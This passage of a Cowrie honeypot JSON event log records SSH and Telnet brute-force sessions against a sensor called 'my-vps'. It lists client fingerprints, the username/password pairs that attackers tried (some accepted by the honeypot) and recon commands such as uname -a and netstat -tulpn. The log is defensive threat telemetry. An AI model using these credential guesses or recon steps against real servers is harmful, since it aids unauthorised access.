poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:31:43.113067Z","src_ip":"102.210.148.92","session":"d513c42efe36"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:31:43.861763Z","src_ip":"102.210.148.92","session":"d513c42efe36"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:31:44.027757Z","src_ip":"102.210.148.92","session":"2ef841c63f0a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:31:44.040739Z","src_ip":"102.210.148.92","session":"d513c42efe36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52524,"dst_ip":"1.2.3.4","dst_port":22,"session":"71dfab4c051e","protocol":"ssh","message":"New connection: 212.227.235.229:52524 (1.2.3.4:22) [session: 71dfab4c051e]","sensor":"my-vps","timestamp":"2025-08-31T07:31:58.142418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:31:58.534372Z","src_ip":"212.227.235.229","session":"71dfab4c051e"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-31T07:31:58.535107Z","src_ip":"212.227.235.229","session":"71dfab4c051e"}
{"eventid":"cowrie.session.closed","duration":"15.6","message":"Connection lost after 15.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:32:13.754941Z","src_ip":"212.227.235.229","session":"71dfab4c051e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35308,"dst_ip":"1.2.3.4","dst_port":22,"session":"661671343530","protocol":"ssh","message":"New connection: 212.227.125.160:35308 (1.2.3.4:22) [session: 661671343530]","sensor":"my-vps","timestamp":"2025-08-31T07:32:32.214853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:32:33.397251Z","src_ip":"212.227.125.160","session":"661671343530"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:32:33.397990Z","src_ip":"212.227.125.160","session":"661671343530"}
{"eventid":"cowrie.login.success","username":"root","password":"UBadm","message":"login attempt [root/UBadm] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:32:38.935303Z","src_ip":"212.227.125.160","session":"661671343530"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:32:41.277490Z","src_ip":"212.227.125.160","session":"661671343530"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T07:32:41.278183Z","src_ip":"212.227.125.160","session":"661671343530"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55302,"dst_ip":"1.2.3.4","dst_port":23,"session":"bc8b91e235ca","protocol":"telnet","message":"New connection: 212.227.125.160:55302 (1.2.3.4:23) [session: bc8b91e235ca]","sensor":"my-vps","timestamp":"2025-08-31T07:32:41.280059Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:32:42.043189Z","src_ip":"212.227.125.160","session":"661671343530"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:32:42.044299Z","src_ip":"212.227.125.160","session":"661671343530"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":33766,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbd3c0bab043","protocol":"ssh","message":"New connection: 201.148.180.50:33766 (1.2.3.4:22) [session: bbd3c0bab043]","sensor":"my-vps","timestamp":"2025-08-31T07:32:49.694481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:32:50.371775Z","src_ip":"201.148.180.50","session":"bbd3c0bab043"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:32:50.372852Z","src_ip":"201.148.180.50","session":"bbd3c0bab043"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":42978,"dst_ip":"1.2.3.4","dst_port":22,"session":"faa18458daca","protocol":"ssh","message":"New connection: 102.210.148.92:42978 (1.2.3.4:22) [session: faa18458daca]","sensor":"my-vps","timestamp":"2025-08-31T07:32:52.333658Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:32:52.334749Z","src_ip":"102.210.148.92","session":"faa18458daca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:32:52.498351Z","src_ip":"102.210.148.92","session":"faa18458daca"}
{"eventid":"cowrie.login.success","username":"root","password":"Maggie01","message":"login attempt [root/Maggie01] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:32:52.534192Z","src_ip":"79.127.48.196","session":"6b0e59e71227"}
{"eventid":"cowrie.login.failed","username":"tempusr","password":"@lin@1234","message":"login attempt [tempusr/@lin@1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:32:53.191771Z","src_ip":"102.210.148.92","session":"faa18458daca"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:32:54.358239Z","src_ip":"102.210.148.92","session":"faa18458daca"}
{"eventid":"cowrie.login.success","username":"root","password":"UBadm","message":"login attempt [root/UBadm] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:32:58.675512Z","src_ip":"201.148.180.50","session":"bbd3c0bab043"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:33:01.221053Z","src_ip":"201.148.180.50","session":"bbd3c0bab043"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T07:33:01.221874Z","src_ip":"201.148.180.50","session":"bbd3c0bab043"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"5.4","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:33:06.583433Z","src_ip":"201.148.180.50","session":"bbd3c0bab043"}
{"eventid":"cowrie.session.closed","duration":"16.9","message":"Connection lost after 16.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:33:06.584623Z","src_ip":"201.148.180.50","session":"bbd3c0bab043"}
{"eventid":"cowrie.session.closed","duration":31.472492218017578,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:33:12.752515Z","src_ip":"212.227.125.160","session":"bc8b91e235ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48578,"dst_ip":"1.2.3.4","dst_port":22,"session":"7db8b4cc57b6","protocol":"ssh","message":"New connection: 212.227.235.229:48578 (1.2.3.4:22) [session: 7db8b4cc57b6]","sensor":"my-vps","timestamp":"2025-08-31T07:33:19.454968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:33:19.472407Z","src_ip":"212.227.235.229","session":"7db8b4cc57b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:33:19.678835Z","src_ip":"212.227.235.229","session":"7db8b4cc57b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:33:22.935750Z","src_ip":"79.127.48.196","session":"6b0e59e71227"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-31T07:33:22.936453Z","src_ip":"79.127.48.196","session":"6b0e59e71227"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root@123","message":"login attempt [admin/root@123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:33:29.220453Z","src_ip":"212.227.235.229","session":"7db8b4cc57b6"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:33:30.704783Z","src_ip":"212.227.235.229","session":"7db8b4cc57b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"18.5","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 18.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:33:41.406626Z","src_ip":"79.127.48.196","session":"6b0e59e71227"}
{"eventid":"cowrie.session.connect","src_ip":"165.154.227.50","src_port":53286,"dst_ip":"1.2.3.4","dst_port":22,"session":"c62842828f67","protocol":"ssh","message":"New connection: 165.154.227.50:53286 (1.2.3.4:22) [session: c62842828f67]","sensor":"my-vps","timestamp":"2025-08-31T07:33:41.512918Z"}
{"eventid":"cowrie.client.version","version":"\u0000\u0000\u0004T","message":"Remote SSH version: \u0000\u0000\u0004T","sensor":"my-vps","timestamp":"2025-08-31T07:33:41.513842Z","src_ip":"165.154.227.50","session":"c62842828f67"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:33:41.514505Z","src_ip":"165.154.227.50","session":"c62842828f67"}
{"eventid":"cowrie.session.closed","duration":"142.7","message":"Connection lost after 142.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:33:45.846709Z","src_ip":"79.127.48.196","session":"6b0e59e71227"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":43658,"dst_ip":"1.2.3.4","dst_port":22,"session":"431035304836","protocol":"ssh","message":"New connection: 102.210.148.92:43658 (1.2.3.4:22) [session: 431035304836]","sensor":"my-vps","timestamp":"2025-08-31T07:34:08.670447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:34:08.671384Z","src_ip":"102.210.148.92","session":"431035304836"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:34:08.853716Z","src_ip":"102.210.148.92","session":"431035304836"}
{"eventid":"cowrie.login.failed","username":"user","password":"abcd1234","message":"login attempt [user/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:34:09.623266Z","src_ip":"102.210.148.92","session":"431035304836"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:34:10.807840Z","src_ip":"102.210.148.92","session":"431035304836"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57301,"dst_ip":"1.2.3.4","dst_port":23,"session":"02a00520057b","protocol":"telnet","message":"New connection: 212.227.235.229:57301 (1.2.3.4:23) [session: 02a00520057b]","sensor":"my-vps","timestamp":"2025-08-31T07:35:16.566534Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":40666,"dst_ip":"1.2.3.4","dst_port":22,"session":"97c239c1793d","protocol":"ssh","message":"New connection: 102.210.148.92:40666 (1.2.3.4:22) [session: 97c239c1793d]","sensor":"my-vps","timestamp":"2025-08-31T07:35:23.720194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:35:23.721078Z","src_ip":"102.210.148.92","session":"97c239c1793d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:35:23.896812Z","src_ip":"102.210.148.92","session":"97c239c1793d"}
{"eventid":"cowrie.login.failed","username":"jacob","password":"dell@2023","message":"login attempt [jacob/dell@2023] failed","sensor":"my-vps","timestamp":"2025-08-31T07:35:24.641309Z","src_ip":"102.210.148.92","session":"97c239c1793d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:35:25.819086Z","src_ip":"102.210.148.92","session":"97c239c1793d"}
{"eventid":"cowrie.session.closed","duration":31.243334531784058,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:35:47.809798Z","src_ip":"212.227.235.229","session":"02a00520057b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26181,"dst_ip":"1.2.3.4","dst_port":22,"session":"d464121d7ca8","protocol":"ssh","message":"New connection: 212.227.235.229:26181 (1.2.3.4:22) [session: d464121d7ca8]","sensor":"my-vps","timestamp":"2025-08-31T07:36:04.491614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T07:36:04.841785Z","src_ip":"212.227.235.229","session":"d464121d7ca8"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T07:36:04.946171Z","src_ip":"212.227.235.229","session":"d464121d7ca8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"volkodav","message":"login attempt [admin/volkodav] failed","sensor":"my-vps","timestamp":"2025-08-31T07:36:05.448566Z","src_ip":"212.227.235.229","session":"d464121d7ca8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vishnu","message":"login attempt [admin/vishnu] failed","sensor":"my-vps","timestamp":"2025-08-31T07:36:06.556214Z","src_ip":"212.227.235.229","session":"d464121d7ca8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vicki","message":"login attempt [admin/vicki] failed","sensor":"my-vps","timestamp":"2025-08-31T07:36:07.664386Z","src_ip":"212.227.235.229","session":"d464121d7ca8"}
